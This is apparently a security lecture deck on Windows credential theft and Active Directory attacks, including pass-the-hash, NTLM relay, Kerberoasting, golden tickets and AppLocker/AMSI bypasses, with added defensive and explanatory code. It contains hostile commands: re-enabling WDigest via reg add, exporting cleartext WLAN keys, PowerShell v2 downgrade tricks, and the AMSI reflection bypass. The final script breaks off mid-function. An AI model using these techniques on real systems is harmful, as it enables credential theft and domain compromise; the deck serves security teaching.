• Very weak! (disabled by default since Server 2008 / Vista)
• You should not use LM hashes anymore
• How it works
• Convert the input to upper case
• Max. length is 14 (shorter inputs are padded with null bytes)
• Split the password into two 7-byte halves
• Use each half as a DES key to encrypt the fixed string "KGS!@#$%" (two encryptions)
• Concatenate both 8-byte results
• Rainbow tables can crack LM hashes in seconds
• Ophcrack
• The NT hash is also crackable, but it's harder!
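The LM construction above, as an added example in Go that is not part of the lecture or of any tool it mentions: it computes the hash step by step with the standard library's DES and adds a small audit check a defender can run over dumped hashes (the "empty" second half reveals a password of 7 characters or fewer, and the all-empty value means no LM hash is stored). It assumes ASCII passwords; the sample passwords are constructed.

```go
package main

import (
	"crypto/des"
	"encoding/hex"
	"fmt"
	"strings"
)

// Fixed plaintext that every LM hash encrypts; the secret is the DES key.
var lmMagic = []byte("KGS!@#$%")

// DES of the magic string under an all-zero key, i.e. the hash of an empty
// 7-byte half. In a dump it marks "no LM hash stored" (both halves) or a
// password of at most 7 characters (second half only).
const lmEmptyHalf = "aad3b435b51404ee"

// desKeyFrom7 spreads a 7-byte password half over the 8-byte DES key layout:
// 7 key bits per byte, lowest bit reserved for parity and left clear
// (DES ignores the parity bits, so no parity is computed).
func desKeyFrom7(half []byte) []byte {
	return []byte{
		half[0] & 0xFE,
		(half[0]<<7 | half[1]>>1) & 0xFE,
		(half[1]<<6 | half[2]>>2) & 0xFE,
		(half[2]<<5 | half[3]>>3) & 0xFE,
		(half[3]<<4 | half[4]>>4) & 0xFE,
		(half[4]<<3 | half[5]>>5) & 0xFE,
		(half[5]<<2 | half[6]>>6) & 0xFE,
		(half[6] << 1) & 0xFE,
	}
}

// LMHash follows the slide step by step: upper-case, pad/truncate to 14 bytes,
// split into two 7-byte halves, DES-encrypt the magic string under each half,
// concatenate. Assumes an ASCII password (real LM uses the OEM code page).
func LMHash(password string) string {
	padded := make([]byte, 14)              // null padding for short passwords
	copy(padded, strings.ToUpper(password)) // copy truncates at 14 bytes
	out := make([]byte, 16)
	for i := 0; i < 2; i++ {
		block, err := des.NewCipher(desKeyFrom7(padded[i*7 : i*7+7]))
		if err != nil {
			panic(err) // key is always 8 bytes, so this cannot happen
		}
		block.Encrypt(out[i*8:i*8+8], lmMagic)
	}
	return hex.EncodeToString(out)
}

// LMHalves returns the two independent 8-byte halves as hex strings. Each half
// depends on at most 7 upper-case characters, which is why the effective key
// space is tiny and rainbow tables cover it.
func LMHalves(lmHex string) (string, string) {
	return lmHex[:16], lmHex[16:]
}

// AuditLMHash is the defender's check over a dumped LM hash: does the account
// store no LM hash at all, and if it does, does the hash betray a short password?
func AuditLMHash(lmHex string) (noLMStored bool, shortPassword bool) {
	if len(lmHex) != 32 {
		return false, false
	}
	first, second := LMHalves(strings.ToLower(lmHex))
	noLMStored = first == lmEmptyHalf && second == lmEmptyHalf
	shortPassword = !noLMStored && second == lmEmptyHalf
	return noLMStored, shortPassword
}

func main() {
	// Constructed sample passwords.
	for _, pw := range []string{"", "password", "PaSsWoRd", "short", "averyveryverylongpassword"} {
		h := LMHash(pw)
		noLM, short := AuditLMHash(h)
		fmt.Printf("%-28q -> %s  (noLMStored=%v shortPassword=%v)\n", pw, h, noLM, short)
	}
}
```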
Password attacks
Source: http://tricks-collections.com/crack-windows-xp-vista-password/
Password Length vs. GPU Cracking
• Offline password brute-force attack speed:
• ~41.800M (41.8 billion) passwords/second (against NTLM hashes)
• Less than 1-2 days for all possible passwords with a length of up to 8 characters (ASCII)
Password Length vs. Rainbowtables
Publicly available rainbowtables for NT hashes ($)
LSA Secrets
• If you configure a service or scheduled task to run with a special user account, the credentials are stored in the LSA cache
• The cleartext credentials can be extracted from the registry
• This gave me domain admin so many times….
LSA Secrets
Cleartext password of a domain admin user… (privilege escalation from local admin to domain admin)
Credential Guard (see later slides) does not protect LSA secrets!
Dumping plaintext passwords
• We can steal stored cleartext credentials of services, scheduled tasks, and so on from the LSA cache, and we can steal NTLM hashes (for pass-the-hash) and some other types of credentials. However, we can also steal cleartext credentials of currently logged-in users!
• The Local Security Authority Subsystem (LSASS) process memory contains:
• Kerberos keys (RC4/NT hash, AES128/AES256)
• Kerberos tickets (TGT and service tickets)
• NT hashes
• (LM hashes)
• Plaintext passwords
• (Smartcard PINs)
Dumping plaintext passwords
• Dump passwords with mimikatz
Microsoft Prevention
• Protected Process Light
• Special process flag which marks the process as protected
• Even administrators can't access the process anymore
• Problem: a kernel driver can disable the protection, and an administrator can load a kernel driver… (partially mitigated in the latest Windows 10 with driver signature enforcement)
• Also some other bypass techniques from Google Project Zero…
• Disabled WDigest authentication (KB2871997)
• Idea: without WDigest authentication, cleartext credentials are not required (and will not be stored in memory)
• Problem: WDigest authentication can easily be re-enabled by an attacker….
• reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
• Other protections: RDP Restricted Admin mode (but this enables pass-the-hash attacks) and the Protected Users group
Process protection
Source: https://twitter.com/gentilkiwi/status/381913850737487872
Disables the "Protected Process Light" flag of lsass.exe
OS Layers
Source: Breaking Modern OS Defenses with Firmware Attacks
Virtualization Based Security
Source: Breaking Modern OS Defenses with Firmware Attacks
OS Layers
Source: Breaking Modern OS Defenses with Firmware Attacks
Mitigating Credential Theft Attacks
Windows 10 Feature: Isolated User Mode
Before Windows 10:
Source: Seth Moore, Microsoft
Mitigating Credential Theft Attacks
Windows 10 Feature: Isolated User Mode
Source: Seth Moore, Microsoft
Credential Guard and DMA Protection
• Credential Guard:
• The LSASS process is split into two processes
• LSASS.exe interacts with LSAISO
• LSAISO.exe stores the hashes, tickets, …
• Even if we obtain SYSTEM privileges on a system we can't extract hashes or tickets, because they are stored in the isolated world which we can't access!
• However, we can just patch lsass.exe to log all credentials when a user logs in….
• Result: the attacker still gets the same information, he just has to wait longer…
• Device Guard is also part of VBS on Windows 10
• Will be discussed later
Credential Guard and DMA Protection
• DMA Protection:
• FireWire, Thunderbolt, PCIe, … can access the physical RAM via DMA (Direct Memory Access)!
• Start the laptop until it's locked at the Windows login screen.
• Connect the laptop via FireWire to your own system and use DMA to overwrite Microsoft's password-check function so that it always returns true
• Use any password to log in!
• This also works if the system is encrypted with BitLocker in transparent mode!
• Check: https://github.com/ufrisk/pcileech
• DMA Protection tries to prevent this; however, it can only do so once Windows is loaded! During UEFI initialization the system can still be vulnerable!
NTLM & Kerberos
NTLMv1 / NTLMv2
• Another problem is the NTLM protocol
• The NTLM protocol is not the same as the NTLM hash!
• We previously discussed the NT & LM hash (NTLM hash)
• Now we speak about the NTLM protocol, which is also often called NetNTLMv1, NetNTLMv2, NTLMv1, NTLMv2
• Compared to Kerberos, NTLM is a weaker authentication protocol
• Main problems of the NTLM protocol from a security perspective:
1. The cleartext password is NOT required to authenticate: we can authenticate by just knowing the NTLM hash (pass-the-hash)
2. We can force a client to authenticate against us: we can sniff the NetNTLM hash and start offline brute-forcing it
3. We can relay an authentication (NTLM relaying)
• Recommended reading: https://digital-forensics.sans.org/blog/2012/09/18/protecting-privileged-domain-accounts-network-authentication-in-depth
NTLMv2
Source: Microsoft
What is the Pass-The-Hash attack? (PTH)
• Published by Paul Ashton in 1997
• Exploits the fact that only the password hash is required to complete an NTLM authentication (the password is not required)
• Every service/application supporting NTLM authentication is vulnerable to pass-the-hash attacks
• Microsoft does not recommend using NTLM for applications
• Side note: since a patch this only works with the built-in administrator or with domain users which are local administrators
Pass-the-Hash attack
We hacked system 10.0.50.170 because of a vulnerability
• Nowadays we use MS17_010 instead of MS08_064
We obtained the local admin hash and can use it to compromise other systems
Pass-the-Hash attack
System 10.0.50.160 contains another vulnerability (HFS)
Hashdump is currently not working because the shell is 32-bit
Pass-the-Hash attack
Migrate into a 64-bit process (PID 448)
Now we can hashdump again. Same administrator hash!
Pass-the-Hash attack
We can spawn shells in the domain using the hash!
Mimikatz
We can also start mimikatz to get cleartext credentials of domain users
Mimikatz
Check where the user can connect and own these systems…
Responder
• If a client connects to us, we get a challenge + response pair, which we can brute-force offline to obtain the cleartext password (+ we get the username. We already identified real hackers using this technique with a callback document…)
• Victim (10.0.50.20, domain admin ckadmin):
• Attacker (10.0.50.150, running responder.py):
Responder
We need a way to force a victim to connect to us…
• Responder already includes several "poisoners" which always respond with our IP to LLMNR, NetBIOS or DNS queries…
• We can add images / sub-documents in Word, PDF, e-mail, …
• Many other techniques: ARP spoofing, WPAD, IPv6 DNS injection, …
Responder
• Example: I opened my browser on the victim and entered garbage:
Responder
• Example: the attacker is spoofing LLMNR answers which point to the attacker's IP
Responder
• But it also works if currently no user is logged in on a system…. (This is the machine account; you can see this from the $ after the name in WKSTN-50$):
• Important: this hash can't be used for pass-the-hash (it's an NTLMv2 / Net-NTLMv2 hash. It's the response to the server & client challenge, calculated with the NTLM hash. If you know the NTLM hash you can calculate the Net-NTLM hash; that's why pass-the-hash works!)
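The challenge/response relationship above (and the three NTLM protocol problems listed on the NTLMv1 / NTLMv2 slide), as an added example in Go that is not from the lecture and not from Responder or impacket: it follows the NTOWFv2 / NTProofStr computation of MS-NLMP (HMAC-MD5 keyed from the NT hash), so it shows why the NT hash alone is enough to answer a challenge (pass-the-hash) and why a captured Net-NTLMv2 response cannot be replayed against a fresh challenge. The NT hash, challenges, user name and AV pairs are constructed placeholders.

```go
package main

import (
	"bytes"
	"crypto/hmac"
	"crypto/md5"
	"encoding/binary"
	"encoding/hex"
	"fmt"
	"strings"
	"unicode/utf16"
)

// utf16le encodes text the way Windows feeds it into NTLM (UTF-16, little endian).
func utf16le(s string) []byte {
	units := utf16.Encode([]rune(s))
	out := make([]byte, 2*len(units))
	for i, u := range units {
		binary.LittleEndian.PutUint16(out[2*i:], u)
	}
	return out
}

func hmacMD5(key []byte, parts ...[]byte) []byte {
	m := hmac.New(md5.New, key)
	for _, p := range parts {
		m.Write(p)
	}
	return m.Sum(nil)
}

// NTOWFv2 derives the per-user NTLMv2 key (MS-NLMP 3.3.2). Its only secret
// input is the NT hash; the password itself never appears anywhere.
func NTOWFv2(ntHash []byte, user, domain string) []byte {
	return hmacMD5(ntHash, utf16le(strings.ToUpper(user)+domain))
}

// ClientBlob assembles the "temp" structure sent along with the proof: version
// bytes, a FILETIME timestamp, the client's own random challenge and the target
// info (AV pairs) copied from the server's CHALLENGE message.
func ClientBlob(timestamp uint64, clientChallenge, targetInfo []byte) []byte {
	var b bytes.Buffer
	b.Write([]byte{0x01, 0x01, 0, 0, 0, 0, 0, 0}) // RespType, HiRespType, reserved
	binary.Write(&b, binary.LittleEndian, timestamp)
	b.Write(clientChallenge)    // 8 bytes
	b.Write([]byte{0, 0, 0, 0}) // reserved
	b.Write(targetInfo)
	b.Write([]byte{0, 0, 0, 0})
	return b.Bytes()
}

// NTProofStr is the 16-byte value Responder captures as the "Net-NTLMv2 hash":
// HMAC-MD5 over the server challenge and the blob, keyed with NTOWFv2.
func NTProofStr(ntHash []byte, user, domain string, serverChallenge, blob []byte) []byte {
	return hmacMD5(NTOWFv2(ntHash, user, domain), serverChallenge, blob)
}

// VerifyResponse is the server-side check: whoever holds the NT hash (the
// server itself, or the DC it forwards the exchange to) recomputes the proof
// for the challenge it issued and compares in constant time.
func VerifyResponse(ntHash []byte, user, domain string, serverChallenge, blob, proof []byte) bool {
	return hmac.Equal(NTProofStr(ntHash, user, domain, serverChallenge, blob), proof)
}

func main() {
	// Constructed sample values: the NT hash is a placeholder, not from a real account.
	ntHash, _ := hex.DecodeString("00112233445566778899aabbccddeeff")
	serverChallenge := []byte{0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88}
	// One AV pair: MsvAvNbDomainName "LAB", followed by MsvAvEOL.
	targetInfo := []byte{0x02, 0x00, 0x06, 0x00, 'L', 0, 'A', 0, 'B', 0, 0, 0, 0, 0}
	blob := ClientBlob(0x01d3a0b1c2d3e4f5, []byte{1, 2, 3, 4, 5, 6, 7, 8}, targetInfo)

	// Pass-the-hash: the client side never knew the password, only the hash,
	// yet the server accepts the response.
	proof := NTProofStr(ntHash, "ckadmin", "LAB", serverChallenge, blob)
	fmt.Printf("NTProofStr=%x accepted=%v\n", proof,
		VerifyResponse(ntHash, "ckadmin", "LAB", serverChallenge, blob, proof))

	// A captured proof cannot be replayed: the next connection gets a fresh challenge.
	fresh := []byte{0x99, 0x88, 0x77, 0x66, 0x55, 0x44, 0x33, 0x22}
	fmt.Printf("replayed against a new challenge accepted=%v\n",
		VerifyResponse(ntHash, "ckadmin", "LAB", fresh, blob, proof))
}
```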
NTLM Relay Attack
We can brute-force this hash, but we can't pass it. However, we can relay it (one time)!
Source: https://pen-testing.sans.org/blog/2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-python
NTLM Relay Attack
NTLM relay: this attack is from 2001 and still works (!)
• Relaying the hash back to the same system is prevented by MS08-068
• But we can relay it to a different system (which has SMB signing off, which is the default for client systems – backward compatibility ☺)
• This attack only works with local administrative users / domain admins (NTLM relay would work with any user, but the method by which we get code execution only works with admins)
• We can cross-protocol relay the hash from HTTP NTLM to LDAPS NTLM on the domain controller (LDAP signing is off by default). Send a domain admin an e-mail with a link; if he opens it, we NTLM-relay to LDAPS to add a new domain admin…
NTLM Relay Attack
Create a list of possible targets (SMB Signing off):
Target all systems (except DC – Domain Controller):
NTLM Relay Attack
Use Responder to force victims to connect to us and receive shells / hashes (ntlmrelayx.py output):
Use the hash for pass-the-hash, or directly tell ntlmrelayx.py to execute a command via the -c argument.
NTLMv1 vs. NTLMv2
• NTLMv1 (DES-based)
• Vulnerable to rainbow table attacks
• No mutual authentication
• No relay attack protection
• ~34.454.000K passwords/second (single CPU)
• NTLMv2 (MD4-based)
• Not vulnerable to rainbow table attacks (the client also creates a random challenge)
• Introduces mutual authentication
• Relay attack protection (only with EPA – Extended Protection for Authentication, partially with SMB and LDAP signing)
• ~4.585K passwords/second (single CPU)
Kerberos
Source: https://dfirblog.wordpress.com/2015/12/13/protecting-windows-networks-kerberos-attacks/
How Kerberos works
• Kerberos works with symmetric encryption
• The previous picture is not 100% correct (it's simplified)
• Message 2, which contains the TGT, is encrypted with the hash of the "krbtgt" user account (a special domain user).
• (Message 2 also contains a session key which is encrypted with Jon's secret.)
• If the TGT were encrypted with Jon's password, Jon could just modify the TGT…. (this would break the complete security concept)
• The AS (Authentication Service) knows that Jon is really Jon because message 1 contains a timestamp encrypted by Jon with his hash.
• The ticket from message 4 is encrypted with the hash of the target service: Jon can't modify it, but the service can read and handle it.
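The three points above (TGT sealed with the krbtgt key, session key sealed with the user's key, pre-authentication via an encrypted timestamp), as an added toy model in Go that is not from the lecture and is not real Kerberos: AES-GCM stands in for the Kerberos encryption types and a SHA-256 of the password stands in for AD's key derivation, so only the structure of messages 1 and 2 and of the TGS check carries over. It shows that the client can read its session key but cannot open or modify the TGT, and that a forged timestamp or a stale one is rejected. All principals, passwords and keys are constructed.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/sha256"
	"encoding/json"
	"errors"
	"time"
)

// Toy stand-in for a principal's long-term key (in AD: the NT hash for RC4, or
// an AES key derived from the password). Not how AD derives keys.
func LongTermKey(password string) []byte {
	k := sha256.Sum256([]byte(password))
	return k[:]
}

// seal/open use AES-GCM in place of Kerberos' encrypt-and-checksum: any change
// to the sealed bytes by someone without the key is detected on open.
func seal(key, plaintext []byte) []byte {
	block, _ := aes.NewCipher(key)
	gcm, _ := cipher.NewGCM(block)
	nonce := make([]byte, gcm.NonceSize())
	rand.Read(nonce)
	return gcm.Seal(nonce, nonce, plaintext, nil)
}

func open(key, sealed []byte) ([]byte, error) {
	block, _ := aes.NewCipher(key)
	gcm, _ := cipher.NewGCM(block)
	n := gcm.NonceSize()
	if len(sealed) < n {
		return nil, errors.New("sealed data too short")
	}
	return gcm.Open(nil, sealed[:n], sealed[n:], nil)
}

// TGT is what the KDC puts inside message 2; readable only with the krbtgt key.
type TGT struct {
	Client     string
	SessionKey []byte
	Expires    time.Time
}

// KDC holds the krbtgt key and every principal's long-term key.
type KDC struct {
	KrbtgtKey []byte
	UserKeys  map[string][]byte
}

// PreAuth is message 1's proof of identity: the current time sealed with the
// user's own key. Only someone holding Jon's key can produce it.
func PreAuth(userKey []byte, now time.Time) []byte {
	return seal(userKey, []byte(now.UTC().Format(time.RFC3339)))
}

// ASExchange checks the pre-auth timestamp, then returns message 2: the TGT
// sealed with the krbtgt key plus the session key sealed with the user's key.
func (k *KDC) ASExchange(user string, preAuth []byte, now time.Time) (tgt, encSession []byte, err error) {
	userKey, ok := k.UserKeys[user]
	if !ok {
		return nil, nil, errors.New("unknown principal")
	}
	ts, err := open(userKey, preAuth)
	if err != nil {
		return nil, nil, errors.New("pre-authentication failed")
	}
	t, err := time.Parse(time.RFC3339, string(ts))
	if err != nil || t.Before(now.Add(-5*time.Minute)) || t.After(now.Add(5*time.Minute)) {
		return nil, nil, errors.New("clock skew too great")
	}
	session := make([]byte, 32)
	rand.Read(session)
	body, _ := json.Marshal(TGT{Client: user, SessionKey: session, Expires: now.Add(10 * time.Hour)})
	return seal(k.KrbtgtKey, body), seal(userKey, session), nil
}

// TGSValidate is what the KDC does with the TGT presented in message 3: open it
// with the krbtgt key. A TGT the client modified or forged fails here.
func (k *KDC) TGSValidate(tgt []byte, now time.Time) (*TGT, error) {
	body, err := open(k.KrbtgtKey, tgt)
	if err != nil {
		return nil, errors.New("TGT integrity check failed")
	}
	var t TGT
	if err := json.Unmarshal(body, &t); err != nil {
		return nil, err
	}
	if now.After(t.Expires) {
		return nil, errors.New("TGT expired")
	}
	return &t, nil
}
```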
Kerberos Attacks
• Many different attacks, here I just list the most useful ones
• Kerberoasting
• Request a ticket for a service; the ticket is encrypted with the password of the service account, so we can start offline brute-forcing the ticket to obtain the service password!
• Using the service password we can create arbitrary service tickets (e.g. with more privileges). This is called a "silver ticket" attack.
• Golden ticket
• If we already compromised a domain, we can dump the krbtgt hash; using it we can create our own TGT tickets (domain persistence!)
• Pass the ticket
• Similar to pass-the-hash attacks, we can use mimikatz to steal tickets and inject them on another computer
• E.g.: use the ticket to change the password of a user account without knowing the cleartext password (we can also PTH here)
• Avoid port scanning: setspn -Q */*
Kerberoasting
• Step 1: Check the accounts which have an SPN (Service Principal Name) set (where you can request a ticket)
Kerberoasting
• Step 2: Request a ticket for the SPN (with weak RC4 type)
Kerberoasting
• Step 3: Use mimikatz to dump the ticket
Kerberoasting
• Step 4: Start offline bruteforcing
Golden ticket
• As soon as we have a domain admin account, we can "add a faked" domain controller (our own system) and synchronize the password hashes with the real domain controller….
• We ask for the krbtgt user hash
Golden ticket
• We can use the hash to create arbitrary tickets! (e.g. also for non-existing user accounts which should be domain admin)
• We can use the ticket at any time for DCSync to get the hashes of new users again
Some useful commands in Windows domain
• Get user account information (e.g. when the password was last set):
net user /domain *userName*
• Get domain account names
net group /domain "Domain Admins"
net group /domain "Enterprise Admins"
• Get password policy
net accounts /domain
• Get firewall rules
netsh firewall show config
Some useful commands in Windows domain
• Installed anti-virus solution (in PowerShell)
Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
• Installed patches:
wmic qfe get Caption,Description,HotFixID,InstalledOn
• Get the domain controller IP:
[System.Directoryservices.Activedirectory.Domain]::GetCurrentDomain()
• Extract cleartext WLAN passwords:
netsh wlan export profile folder=. key=clear
Domain recon
• Phineas Fisher: "The best tool these days for understanding windows networks is PowerView"
• BloodHound: based on PowerView, visualizes the network!
• https://github.com/BloodHoundAD/BloodHound/wiki/
• A modified version of PowerView queries the information
• Queries users, computers, relationships, sessions and displays them in a graph
BloodHound / SharpHound
• Display concept:
Source: https://github.com/BloodHoundAD/BloodHound/wiki/
BloodHound / SharpHound
Path from compromised user account to domain admin
Source: https://wald0.com/?p=112
Application Whitelisting
Application Whitelisting
• Idea
• Servers run few applications (web server, database server, anti-virus product, ...)
• Applications change very rarely
• Prevent the execution of other applications
• This prevents the execution of "unwanted applications" (viruses, malware, applications from hackers, and so on)
Application Whitelisting
• Main field of application
• Systems in critical infrastructures (e.g. SCADA environments)
• Important company systems / servers
• Workstations with high security requirements (administrative workstations)
• Kiosk systems
• ....
Application Whitelisting
• Solutions:
• Microsoft AppLocker
• McAfee Application Control (Solidcore)
• Bit9 Parity Suite
• CoreTrace Bouncer
• Lumension Application Control
• SignaCert Enterprise Trust Services
Bypassing Application Whitelisting
• Problem: we cannot execute our own application
• Solution: abuse installed / whitelisted applications: find a whitelisted application which can be used to execute code
• It should be whitelisted on all systems
• Windows-specific executables
• Executables installed by common 3rd-party tools (e.g. Office)
PowerShell
• Pentester's best friend – PowerShell
• Available since Microsoft Windows Vista
• Whitelisted by default
• Can be used to invoke shellcode (even if PowerShell scripts are disabled)!
PowerShell examples
PowerShell
• Example with some obfuscation (powershell -ver 2):
• Windows ignores ^
• Environment variables can be "removed" with :~0,-Length
• Argument 2 can also be written as 0000000002.0000
The above payload starts PowerShell in version 2 (security features like logging or AMSI are not available there)
PowerShell
• The first symbol was not "?" (this would not work), it was U+2015
PowerShell examples
• Which PowerShell script do we start?
• Have a look at PowerSploit!
• „PowerSploit is a collection of Microsoft PowerShell modules
that can be used to aid penetration testers during all phases
of an assessment.“
• https://github.com/mattifestation/PowerSploit
• Examples: DllInjection, PE-File Injection, Invoke Shellcode,
Keylogging, Portscan, Mimikatz, …
AMSI
• Antimalware Scan Interface (AMSI)
• Security feature in Windows 10
• Interface for AntiVirus products to scan scripts
• PowerShell, VBScript, JScript
• Every piece of invoked code is passed to the AV
• PowerShell without powershell.exe (hosting the engine in another process) is useless against it
• Diskless execution is useless
• Code obfuscation is not so effective
• In general a good idea, but many AVs don't support it…
• AVs currently supporting it: Microsoft Defender, AVG, ESET
AMSI
• Many public bypasses, e.g. the bypass from Matt Graeber:
• Access the (private) variable „amsiInitFailed“ of the AmsiUtils class via reflection and set it to true…
• A similar technique also works to disable logging (however, logging can also be disabled by injecting into the service and suspending all its threads…)
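The reflection bypass above leaves a trace in PowerShell Script Block Logging (Event ID 4104) because the script text itself names the private field. As an added example (not part of the lecture), the following hunts the PowerShell Operational log for those strings; it assumes Script Block Logging is enabled via policy and that the indicator list, which is constructed from the terms on this page, is extended from your own telemetry.

```powershell
# Added example (not from the lecture): hunt the PowerShell Operational log for
# script blocks that touch AMSI internals or downgrade to the version 2 engine.
# Assumes Script Block Logging (Event ID 4104) is enabled and that the caller has
# rights to read Microsoft-Windows-PowerShell/Operational.

# Constructed starting set of indicators, taken from the techniques on this page.
$Indicators = @(
    'amsiInitFailed',     # private field flipped by the reflection bypass
    'AmsiUtils',          # class that holds that field
    'NonPublic',          # BindingFlags needed to reach a private member via reflection
    '-version 2',         # downgrade to the engine without AMSI and logging
    '-ver 2', '-v 2'
)

function Find-AmsiTampering {
    param(
        [datetime]$Since = (Get-Date).AddDays(-1),
        [int]$MaxEvents = 5000
    )
    $filter = @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104                    # "Creating Scriptblock text" events
        StartTime = $Since
    }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            # In a 4104 event, Properties[2] carries the ScriptBlockText fragment
            $text = [string]$_.Properties[2].Value
            if (-not $text) { return }
            $hits = $Indicators | Where-Object { $text -like "*$_*" }
            if ($hits) {
                [pscustomobject]@{
                    Time       = $_.TimeCreated
                    RecordId   = $_.RecordId
                    Indicators = ($hits -join ', ')
                    Snippet    = $text.Substring(0, [Math]::Min(120, $text.Length))
                }
            }
        }
}

Find-AmsiTampering | Format-Table -AutoSize
```

Long script blocks are split across several 4104 events, so group by ScriptBlockId (Properties[3]) if you need the full text of a hit.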
AMSI
Basic Code Execution
• Simple ideas:
• User in front of a system (kiosk systems, social engineering, ...)
• Malicious USB stick (Rubber Ducky)
Basic Code Execution
• What if we don't have such a possibility?
• Attack scenario:
• Send the victim a file
• Victim opens/starts the file
• Victim is infected
• Typically this is not possible
• .exe, .dll, .bat, .com, and many, many more are checked and blocked!
• However, we have to find some other file types...
Basic Code Execution
• Abuse of unchecked file types – HTA
Basic Code Execution
• Abuse of unchecked file types – JS (or .JSE)
Basic Code Execution
• Another attack possibility is file shortcuts!
• Just create a shortcut to the required application (e.g. PowerShell)
• Pass the arguments inside the shortcut
• With Windows Explorer we are limited to MAX_PATH
• Use the Windows API to create the shortcut instead
Basic Code Execution
Basic Code Execution
Basic Code Execution
• Abuse of unchecked file types – .chm
Full Code Execution
• Malicious Java applet
Bypassing AppLocker
• Attack vector: Microsoft Office
• Macro, embedded OLE object, DDE, EPS/RTF exploits, responder image / openDoc, …
• Basically the same as Java applets
• We can start applications → launch PowerShell
• We can inject shellcode → full code execution
• Useful tool - shellcode2vbscript
• Written by Didier Stevens
• http://blog.didierstevens.com/2009/05/06/shellcode-2-vbscript/
• Modify the script to work against 64-bit systems:
• Long → LongPtr
• Use PtrSafe in front of the function declarations
Bypassing AppLocker
• OLE attack: a double click will start the embedded script.
Source: The Current Threat Landscape, Modern Defenses & Effective Detection, Sean Metcalf
Bypassing AppLocker
Source: https://securingtomorrow.mcafee.com/mcafee-labs/dropping-files-temp-folder-raises-security-concerns/
• CVE-2018-0802
• OLE is nowadays also used to drop the malware to disk before a memory corruption exploit starts it automatically.
• Example: CVE-2018-0802
• https://github.com/rxwx/CVE-2018-0802/blob/master/packager_exec_CVE-2018-0802.py
• Blog posts with details:
• https://research.checkpoint.com/another-office-equation-rce-vulnerability/
• https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about/
Bypassing AppLocker
• Equation Editor was compiled in 2000 and is a standalone application called by Word.
• The memory corruption protections of Word are not active for it (it basically has no memory corruption protections enabled…)
• Vanilla stack based buffer overflow → used in real-world attacks
Source: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about/
Bypassing AppLocker
• Another problem of AppLocker are the default rules:
Bypassing AppLocker
• Problem: This whitelists everything in C:\Windows\*
• Standard users can write to several locations there
• E.g.: C:\Windows\Tasks\ is writable!
Bypassing AppLocker
Question: What if additional exception rules are configured which remove the writable locations from the whitelist?
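Whether the exception rules actually cover every writable directory is something a defender can check rather than assume. The following audit is an added example (not from the lecture): it lists directories under %WINDIR% that low-privilege principals may write to and reports those that fall under an Allow path rule of the effective AppLocker policy without a matching exception. It assumes the AppLocker cmdlets are present (Windows 8 / Server 2012 or later), the property names of the AppLocker policy object model (PathConditions, PathExceptions) as I know them, and a constructed list of low-privilege principals.

```powershell
# Added example, not from the lecture: audit AppLocker Allow path rules against
# user-writable directories. Assumes the AppLocker module and an effective policy;
# the principal list and the path-variable mapping are constructed for this host.

$LowPrivPrincipals = 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone',
                     'NT AUTHORITY\INTERACTIVE'

# AppLocker path variables used by the default rules, mapped to real paths
$PathVars = @{ '%WINDIR%' = $env:WINDIR; '%SYSTEM32%' = "$env:WINDIR\System32"
               '%PROGRAMFILES%' = $env:ProgramFiles; '%OSDRIVE%' = $env:SystemDrive }

function Expand-AppLockerPath([string]$p) {
    foreach ($k in $PathVars.Keys) { $p = $p -replace [regex]::Escape($k), $PathVars[$k] }
    return $p   # the trailing '*' of a rule doubles as a -like wildcard below
}

function Get-UserWritableDirs([string]$Root = $env:WINDIR, [int]$Depth = 2) {
    # Specific write rights only; generic-right ACEs are not decoded here
    $mask = [int][System.Security.AccessControl.FileSystemRights]'CreateFiles, CreateDirectories'
    Get-ChildItem -Path $Root -Directory -Recurse -Depth $Depth -ErrorAction SilentlyContinue |
      Where-Object {
        $acl = Get-Acl -LiteralPath $_.FullName -ErrorAction SilentlyContinue
        $acl -and ($acl.Access | Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $LowPrivPrincipals -contains $_.IdentityReference.Value -and
            (([int]$_.FileSystemRights) -band $mask) -ne 0 })
      } | ForEach-Object FullName
}

function Find-WritableAllowedPaths {
    $allow = foreach ($coll in (Get-AppLockerPolicy -Effective).RuleCollections) {
        foreach ($r in $coll) {
            if ($r.GetType().Name -eq 'FilePathRule' -and "$($r.Action)" -eq 'Allow') {
                [pscustomobject]@{
                    Collection = $coll.RuleCollectionType; Name = $r.Name
                    Paths      = @($r.PathConditions | ForEach-Object { Expand-AppLockerPath $_.Path })
                    Exceptions = @($r.PathExceptions | ForEach-Object { Expand-AppLockerPath $_.Path })
                }
            }
        }
    }
    foreach ($dir in Get-UserWritableDirs) {
        foreach ($rule in $allow) {
            $covered = $rule.Paths      | Where-Object { "$dir\" -like $_ }
            $excused = $rule.Exceptions | Where-Object { "$dir\" -like $_ }
            if ($covered -and -not $excused) {
                [pscustomobject]@{ Collection = $rule.Collection; Rule = $rule.Name; WritableDir = $dir }
            }
        }
    }
}

Find-WritableAllowedPaths | Format-Table -AutoSize
```

Run it as a standard user as well as an administrator: the ACL check reflects group grants, not the caller's token, so both views should agree on the reported directories.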
Bypassing AppLocker
• Problem: ADS (Alternate Data Stream) can bypass it…
Bypassing AppLocker
• Alternate Data Streams can store data, executables and libraries
• Internally they are used to store whether a file was downloaded from the internet
Bypassing AppLocker
• Dir /r can be used to display them:
• Or sysinternals streams.exe
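PowerShell can do the same enumeration as dir /r and additionally peek at the stream content. The script below is an added example (not from the lecture): it lists every named stream under a directory and flags those starting with the PE magic bytes „MZ“. It assumes Windows PowerShell 5.1 (for -Encoding Byte) on an NTFS volume; the default root is the writable C:\Windows\Tasks from the earlier slide.

```powershell
# Added example (not from the lecture): enumerate alternate data streams with the
# -Stream parameter and flag streams whose first two bytes are the PE header 'MZ'.
# Assumes Windows PowerShell 5.1 (-Encoding Byte) and an NTFS volume.

function Get-SuspiciousStreams {
    param([string]$Root = "$env:WINDIR\Tasks", [int]$Depth = 1)
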